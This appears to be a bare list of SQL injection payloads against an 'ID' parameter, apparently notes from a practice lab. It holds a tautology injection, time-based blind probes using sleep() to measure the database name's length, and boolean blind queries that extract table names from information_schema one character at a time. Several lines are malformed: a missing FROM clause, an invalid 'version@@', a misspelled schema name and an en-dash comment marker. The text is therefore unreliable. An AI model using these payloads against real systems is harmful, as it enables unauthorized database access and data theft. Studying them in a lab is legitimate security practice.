ID:1
ID:1
ID:1 or 1=1 -- 
ID:1' and if(length (database())=8 , sleep(10), null) -- 
ID:1' and if(length (database())=8 , version@@, null) -- 
ID:1' and if(length (database())=8 , sleep(5), null) -- 
ID:1' AND (ascii(substr((select table_name information_schema.tables where table_schema='seurity' limit 0,1) ,1,1)) < 105 –- 
ID:1' AND (ascii(substr((select table_name information_schema.tables where table_schema='seurity' limit 0,1) ,1,1)) < 105 –- 
ID:1' AND (ascii(substr((select table_name information_schema.tables where table_schema='seurity' limit 0,1) ,1,1)) < 105 –- 
ID:1' AND (ascii(substr((select table_name information_schema.tables where table_schema='seurity' limit 0,1) ,1,1)) < 105 –- 
ID:1' AND (ascii(substr((select table_name information_schema.tables where table_schema='seurity' limit 0,1) ,1,1)) < 105 –- 
